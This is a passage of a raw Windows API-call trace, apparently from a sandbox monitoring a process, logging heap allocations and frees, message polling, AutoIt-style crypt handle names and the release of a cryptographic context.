RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0129.698] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0129.698] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0129.698] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0129.698] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0129.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0129.699] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0129.699] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0129.699] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0129.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0129.699] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0129.699] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0129.699] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0129.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.699] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0129.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0129.699] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0129.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0129.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0129.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0129.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0129.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0129.706] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.706] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0129.706] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0129.706] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0129.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0129.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0129.707] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0129.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0129.708] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0129.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0129.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0129.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0129.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0129.708] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0129.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0129.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0129.709] FreeLibrary (hLibModule=0x756e0000) returned 1 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0129.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0129.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0129.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0129.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0129.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0129.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0129.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0129.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0129.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0129.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0129.710] CloseHandle (hObject=0x2d0) returned 1 [0129.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0129.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0129.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0129.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0129.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0129.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0129.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0129.762] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0129.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0129.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0129.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0129.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0129.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0129.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0129.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0129.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0129.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0129.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0129.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0129.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0129.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0129.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0129.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0129.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0129.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0129.763] CloseHandle (hObject=0x2a0) returned 1 [0129.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0129.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0129.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e90338 | out: hHeap=0x970000) returned 1 [0129.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0129.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0129.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0129.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0129.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0129.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0129.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0129.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0129.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0129.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0129.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0129.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0129.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0129.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0129.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0129.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0129.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0129.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0129.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0340 | out: hHeap=0x970000) returned 1 [0129.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0129.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0129.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0129.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0129.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0129.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0129.915] HeapFree 